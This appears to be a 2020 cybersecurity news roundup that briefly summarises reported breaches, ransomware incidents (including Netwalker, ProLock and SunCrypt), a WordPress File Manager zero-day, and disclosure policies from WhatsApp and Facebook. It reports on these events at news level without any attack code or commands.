Round Up of Major Breaches and Scams
Banco Estado detected malicious software on its systems that would have affected its platforms. The following is a Google translation of an article that appears at biobiochile.cl. DataBreaches.net was tipped to the breach by @ chum1ng0. The Banco Estado published a press release this Sunday in which it acknowledges that it detected malicious software in its operating systems, a problem that the entity’s cybersecurity teams detected and that have already solved this situation.
The multinational entertainment and record label conglomerate Warner Music Group (WMG) has reported a cyberattack incident involving multiple e-commerce websites hosted and supported via an external service provider. This particular instance may have allowed an ‘unauthorized third party’ to have accessed sensitive and confidential customer information including names, email addresses, contact numbers, billing and shipping address, and credit card details (number, expiration date, CVC/CVV codes).
Telmate, a service used by incarcerated inmates at US prisons to communicate with their friends and loved ones, has exposed a database containing tens of millions of call logs, private messages, and personal information about inmates and their contacts. The database was exposed on the web without a password or any other authentication required to access it. Comparitech security researcher Bob Diachenko on August 13, 2020 discovered the unsecured database and immediately reported it to Global Tel Link, the company that owns and operates Telmate.
Cybercriminals constantly adopt new attack techniques to implement their malicious activities. Recently, Magecart attackers implemented a new web skimming technique by leveraging the popular messaging app Telegram to pilfer card data. According to Malwarebytes, hackers exploited the Telegram app to send stolen payment details from compromised websites. They used the messaging platform to exfiltrate sensitive data by deploying skimmer codes and traditional Trojans.
What a weird story about the lengths some folks will go to to deny that they were responsible for a hack. Ax Sharma reports: A hacker group that goes by the names “John Wick” and “Korean Hackers” have provided BleepingComputer with information on the hacking of the Indian Prime Minister’s Twitter account and the online systems of popular Indian news channel, News18. This same group had previously hacked the video-on-demand service ZEE5 and defaced multiple websites, seeking nothing but a “10 Ethereum ‘donation’ for their help.”
Online marketing company View Media’s unsecured database, which held 38 million U.S. users’ data, was recently exposed online. According to researchers from CyberNews, the database was hosted on a misconfigured Amazon Web Services (AWS) server, allowing anyone to access users’ personal data like full names, email addresses, residence details, phone numbers, and ZIP codes.
The problems for the popular short-video app TikTok don’t seem to subside. After facing a complete ban in India and an impending ban in countries like the U.S. and New Zealand, TikTok is in the soup again over concerns surrounding scammers purchasing ads to promote fake mobile apps, diet pills, and other bogus products and services. According to a recent research by Tenable, TikTok’s popular ‘#ForYou’ page has become a habitat for ad scams.
Round Up of Major Malware and Ransomware Incidents
Argentina’s official immigration agency, Dirección Nacional de Migraciones, is the last victim of the Netwalker ransomware operators. Argentina’s official immigration agency, Dirección Nacional de Migraciones, was hit by a Netwalker ransomware attack that caused the interruption of the border crossing into and out of the country for four hours. The ransomware operators also exfiltrated sensitive data from the agencies as reported by local media.
A newly discovered malware gang is using a clever trick to create malicious Excel files that have low detection rates and a higher chance of evading security systems. Discovered by security researchers from NVISO Labs, this malware gang — which they named Epic Manchego — has been active since June, targeting companies all over the world with phishing emails that carry a malicious Excel document. But NVISO said these weren’t your standard Excel spreadsheets. The malicious Excel files were bypassing security scanners and had low detection rates.
FBI issued a second flash alert about ProLock ransomware stealing data, four months after the first advisory published by the feds on the same threat. The FBI has issued the 20200901-001 Private Industry Notification about ProLock ransomware stealing data on September 1st. The fresh alert is the second one related to this threat, the first one (MI-000125-MW Flash Alert) was published on May 4th, 2020.
A school district in North Carolina disclosed a data breach after having unencrypted files stolen during a SunCrypt Ransomware attack. The Haywood County School district in North Carolina has suffered a data breach after having unencrypted files stolen during a SunCrypt Ransomware attack. The ransomware attack took place on August 24th, 2020, but at the time the family of malware that infected the school district was not revealed.
A new Thanos ransomware strain is trying and failing to deliver the ransom note onto compromised systems by overwriting the computers’ Windows master boot record (MBR). The new Windows MBR locker module has been discovered by security researchers at Palo Alto Networks’ Unit 42 while analyzing two attacks were Thanos ransomware affiliates successfully encrypted devices of state-controlled organizations from the Middle East and North Africa during early July 2020.
Round Up of Major Vulnerabilities and Patches
Millions of WordPress sites have been probed and attacked this week, Defiant, the company behind the Wordfence web firewall said on Friday. The sudden spike in attacks happened after hackers discovered and started exploiting a zero-day vulnerability in “File Manager,” a popular WordPress plugin installed on more than 700,000 sites. The zero-day was an unauthenticated file upload vulnerability that allowed an attacker to upload malicious files on a site running an older version of the File Manager plugin.
WhatsApp addressed six previously undisclosed flaws in its app and disclosed them on a new dedicated security advisory site. WhatsApp announced more transparency about the vulnerabilities affecting its app and will publicly disclose them to the users. The company addressed six previously undisclosed flaws in its app and disclosed them on a new dedicated web site. Some of the vulnerabilities were reported through the Facebook bug-bounty program, while the others were discovered during code reviews.
If the social-media behemoth finds a bug in another platform’s code, the project has 90 days to remediate before Facebook goes public. Facebook has implemented a fresh security vulnerability disclosure policy (VDP) this week – in an effort to explain how it decides when and how to roll out details on various bugs that its team finds in third-party software and open-source projects.